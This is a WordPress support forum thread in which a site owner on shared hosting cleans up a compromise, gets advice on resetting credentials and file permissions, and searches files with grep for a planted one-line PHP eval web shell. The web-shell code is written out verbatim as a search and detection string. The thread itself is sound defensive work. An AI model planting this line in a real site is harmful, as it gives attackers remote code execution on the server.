found an unauthorized file in the admin/includes directory
Your host might be able to help you discover how that got there and how to increase your FTP security. For sure, you should change the passwords for any FTP-access accounts (or even delete those accounts) anyone has ever had at your server, and you should also change your password for your cPanel at your host.
If he has a database dump is the password compromised?
Either way, you can change your database password at your cPanel and then add that updated password to wp-config.php, and then change the permissions for wp-config.php so only you can ever change that file. Also, the Sucuri Free plugin has a convenient features for changing your WordPress keys for admin access and to reset your user account passwords.
Thread Starter
Zane
(@zane)
Thank you for the feedback leejosepho.
If the hacker has my DB and the key does that mean he knows what the password was?
If the hacker has my DB and the key does that mean he knows what the password was?
That short piece of code is about far more than just your database, and you can read more about it at some of these links:
https://www.google.com/search?q=%3C%3Feval%28%24_POST%5Ba%5D%29%3B%3F%3E
Have you discovered anything else so far?
Thread Starter
Zane
(@zane)
Well bluehost is crap with intrusion support.
So far I have found code in another site where they had injected weird air jordan links ( I guess to spoof Pagerank? ). I also got an email from Google claiming 3 sites had been compromised.
I am baffled that a shared host doesn’t offer basic malware / trojan / eval scanning on their servers.
I have upgraded all of my scripts and am still trying to find out how to do a server wide scan. I am trying to do a search on all files for that eval code
grep -r “<?eval($_POST[a]);?>”
Still waiting on results.
There has got to be a way to use a scanning tool on a shared server without root access.
